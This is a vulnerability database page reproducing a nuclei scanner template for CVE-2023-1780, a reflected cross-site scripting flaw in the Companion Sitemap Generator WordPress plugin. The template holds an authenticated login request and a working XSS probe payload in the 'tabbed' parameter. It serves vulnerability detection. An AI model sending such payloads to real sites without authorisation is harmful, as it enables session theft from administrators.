Lucene search
K

Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Companion Sitemap Generator < 4.5.3 has a Reflected Cross-Site Scripting vulnerability

Related
Refs
Code
id: CVE-2023-1780

info:
  name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the tabbed parameter in sitemap generator pages to steal session cookies from high-privilege users including WordPress administrators.
  remediation: Fixed in version 4.5.3
  reference:
    - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1780
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1780
    cwe-id: CWE-79
    epss-score: 0.01019
    epss-percentile: 0.5913
    cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: codeermeneer
    product: companion_sitemap_generator
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/companion-sitemap-generator/
    fofa-query: body=/wp-content/plugins/companion-sitemap-generator/
    publicwww-query: "/wp-content/plugins/companion-sitemap-generator/"
  tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "re not allowed to view")'
          - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
        condition: and
# digest: 4a0a00473045022100cf9e5a1be4400524cf5be437e11715a0d84fd99b523066cdec74b03f9b090867022026bc1fde9c3421487f0243fe3a898a64b7f5c2ab1e8f2c1e966de242eb6206e5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.16.1
EPSS0.01019
SSVC
25